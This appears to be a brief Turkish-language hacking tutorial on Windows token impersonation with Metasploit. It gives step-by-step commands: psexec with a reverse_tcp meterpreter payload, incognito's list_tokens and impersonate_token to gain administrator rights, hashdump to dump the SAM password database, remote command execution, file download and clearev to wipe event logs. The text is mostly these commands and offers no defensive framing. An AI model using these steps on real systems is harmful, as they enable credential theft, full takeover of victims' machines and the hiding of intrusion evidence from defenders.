Token

Token'ı cookieler gibi düşünebiliriz. bir bilgisayarda açık kalan ve kullanıcı adı şifresi kayıtlı olan hesaba kendi bilgisayarımızdan token sayesinde giriş yapabiliriz. Mimikatz kullanılır.

incognito ile kullanım msfconsole açıyoruz exploitimizi "use exploit/windows/smb/psexec" olarak ayarlıyoruz.

payloadımızı ters bağlantı yapacağımız için "set payload windows/x64/meterpreter/reverse_tcp" olarak ayarlıyoruz.

hedef ip'mizi "set rhosts ..." olarak ayarlıyoruz.

kendi ip'mizi "set lhosts ..." olarak ayarlıyoruz.

hedef domaini "set smbdomain ..." olarak ayarlıyoruz.

hedef smb şifresini "set smbpass ..." olarak ayarlıyoruz.

hedef kullanıcı adını "set smbuser ..." olarak ayarlıyoruz.

show targets diyerek hedef seçebiliriz. yerel bir yükleme yapacağımız için native upload seçebiliriz. load ile incognito'yu yüklüyoruz.

list_tokens -u ile makinde çalışan yöneticiyi görebiliriz.

impersonate_token "...\administrator" ile admin kullanıcıymış gibi gözüküyoruz.

shell yazarak shell alıyoruz ve whoami yazarak yusuf\adminitrator olduğumuzu görüyoruz rev2self ile kendi kullanıcımıza dönebiliriz.

bütün ayarları yaptıktan sonra artık zafiyeti sömürebiliriz.

hashdump ile karşı taraftaki bilgisayarın SAM(Security account manager) veri tabanını görebiliriz.

getuid ile karşı taraftaki bilgisayarın kullanıcı kimliğini görebiliriz.

execute ile karşı tarafta komut çalıştırmamıza yarar. (execute -f cmd.exe -i -H)

edit ile karşı taraftaki bir dosyayı düzenlersiniz.

clearev ile karşı tarafta açılan oturumda oluşturulan log dosyalarını temizler

download ile karşı bilgisayardan dosya indirmeye yarar. Metasploiti başlatırkenki yerel klasöre kaydedilir.

background ile aktif olan meterpeter oturumunu arka plana gönderir ve sizi tekrar msf'e getirir. Tekrar meterpreter oturumuna geçmek için msf exploit(ms08_067_netapi) > sessions -i 1 komutundan faydalanabilirsiniz.

Last updated